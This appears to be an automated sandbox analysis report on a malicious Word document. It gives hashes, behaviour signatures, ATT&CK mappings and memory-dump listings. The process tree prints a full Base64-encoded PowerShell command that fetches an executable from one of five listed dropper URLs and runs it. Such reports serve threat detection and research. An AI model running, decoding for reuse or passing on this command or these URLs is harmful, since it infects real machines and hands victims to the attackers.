7b18ff94d9843443828f7472ed3e4b7f3f2ccb36ef347622ec756c601a3e494c

General

Target

Dokumentenkopie-84150054-190221.doc
Size

277KB
MD5

582ee4846834a26ebc4fd15c845e5c85
SHA1

bb3bb4f1fb4930272c9b036716762d1c3b10ce20
SHA256

0a430c521e0b67b41fe962570eddc2f391c29bc0d9b688b2a35c834cd08a58ae
SHA512

9ac0ec1b3f50abad790cc88de42e20b72182849e02eaf0f28e63c3221029a89e2144daa33fff8358bfd49d4495fd7444a1ae87e5d257ff93345590e54f239f87
SSDEEP

6144:XG5/BnVfRFJ7KK9aHScdX9znGUhYNpuKCxx6djQ:X2n9R/lA5dX9znGUiNrdjQ

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://81.56.198.200/vzDYQ0vT

exe.dropper

http://sosh47.citycheb.ru/Epe9RyrbX

exe.dropper

http://thptngochoi.edu.vn/3X1Gc99SU

exe.dropper

http://fit-school.ru/zCBKJesoEs

exe.dropper

http://diaocthiennam.vn/tcD61klP

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2960	1236	powersheLl.exe	31

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2960	powersheLl.exe
6	2960	powersheLl.exe
9	2960	powersheLl.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLl.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2524	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2960	powersheLl.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2960	powersheLl.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2524	WINWORD.EXE
2524	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2524 wrote to memory of 2328	2524	WINWORD.EXE	30
PID 2524 wrote to memory of 2328	2524	WINWORD.EXE	30
PID 2524 wrote to memory of 2328	2524	WINWORD.EXE	30
PID 2524 wrote to memory of 2328	2524	WINWORD.EXE	30

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Dokumentenkopie-84150054-190221.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2328

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe
powersheLl -e JABpADcAXwBfADkAXwA4AD0AKAAnAGoAMgBfADUAJwArACcANAAnACsAJwA0AF8AJwApADsAJABVAF8AXwBfADMAMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AF8AMgBfADgAXwAyADAAPQAoACcAaAB0AHQAJwArACcAcAAnACsAJwA6AC8ALwA4ADEALgA1ADYALgAnACsAJwAxADkAOAAuADIAMAAwAC8AJwArACcAdgB6AEQAWQAnACsAJwBRADAAJwArACcAdgBUAEAAaAB0ACcAKwAnAHQAJwArACcAcAA6AC8ALwBzAG8AcwBoACcAKwAnADQANwAuAGMAJwArACcAaQAnACsAJwB0AHkAYwAnACsAJwBoACcAKwAnAGUAYgAuAHIAdQAvAEUAcAAnACsAJwBlADkAUgB5AHIAYgBYAEAAJwArACcAaAAnACsAJwB0AHQAcAA6AC8ALwB0AGgAcAB0ACcAKwAnAG4AZwBvAGMAaABvAGkALgBlACcAKwAnAGQAJwArACcAdQAuAHYAbgAvADMAWAAxAEcAYwA5ADkAJwArACcAUwBVAEAAaAB0AHQAcAAnACsAJwA6AC8ALwBmAGkAdAAtAHMAJwArACcAYwBoAG8AJwArACcAbwBsAC4AcgB1ACcAKwAnAC8AegBDAEIASwBKAGUAcwBvAEUAJwArACcAcwAnACsAJwBAAGgAdAB0AHAAOgAvAC8AZABpAGEAbwBjACcAKwAnAHQAaABpAGUAJwArACcAbgAnACsAJwBuAGEAbQAuAHYAbgAvAHQAJwArACcAYwBEACcAKwAnADYAJwArACcAMQBrAGwAUAAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABqADEAMgBfAF8AXwBfADIAPQAoACcAVgAzACcAKwAnADcANgBfACcAKwAnAF8AXwAyACcAKQA7ACQAYgA0ADcAMwAyADkAIAA9ACAAKAAnADQAOAAnACsAJwAwACcAKQA7ACQAegA3ADYAMAA1ADkAXwAwAD0AKAAnAGMAJwArACcANQAzAF8AOAAnACsAJwA2AF8AMAAnACkAOwAkAHoAXwA5ADUAXwBfAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADQANwAzADIAOQArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFIAOQAxADgANwA4ADkANAAgAGkAbgAgACQAegBfADIAXwA4AF8AMgAwACkAewB0AHIAeQB7ACQAVQBfAF8AXwAzADIALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAUgA5ADEAOAA3ADgAOQA0ACwAIAAkAHoAXwA5ADUAXwBfACkAOwAkAGMAXwBfAF8ANwAzADAAXwA9ACgAJwBIADcAJwArACcANgA0ADAAOAAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJAB6AF8AOQA1AF8AXwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAHoAXwA5ADUAXwBfADsAJABiADMAMQA2AF8AXwA9ACgAJwBRADcANwA4ADMAJwArACcANwA3ADYAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAG4AOAA0ADIAXwAyAD0AKAAnAHMAMgAnACsAJwBfAF8AJwArACcANABfACcAKQA7AA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
82416074f8ae2008d5949c9b0f537f7a

SHA1
573c1b86462220e419c6263e2d0f4a22a71fa99d

SHA256
92338e0fa6c153e62ab53a4b731c5d7c947d41451a0cb86a878349089eb3646d

SHA512
ee6f08d35ab1a83ad33e1101c6d5124b232bc69f17e3ade5a6e5cb9265ce2f915ffbc7af9ff989a46fffa795ee0ab827e1dd72f5fcbc0791fd94c036f4be232c

Download Submit
memory/2524-31-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-101-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-4-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-5-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-12-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-92-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-22-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-90-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-89-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-88-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-87-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-86-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-85-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-49-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-117-0x0000000070E4D000-0x0000000070E58000-memory.dmp

Filesize
44KB

Download
memory/2524-2-0x0000000070E4D000-0x0000000070E58000-memory.dmp

Filesize
44KB

Download
memory/2524-91-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-13-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-9-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-58-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-24-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-8-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-7-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-6-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-11-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-10-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-40-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/2524-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2524-100-0x0000000070E4D000-0x0000000070E58000-memory.dmp

Filesize
44KB

Download
memory/2524-0-0x000000002F9C1000-0x000000002F9C2000-memory.dmp

Filesize
4KB

Download
memory/2960-99-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2960-98-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads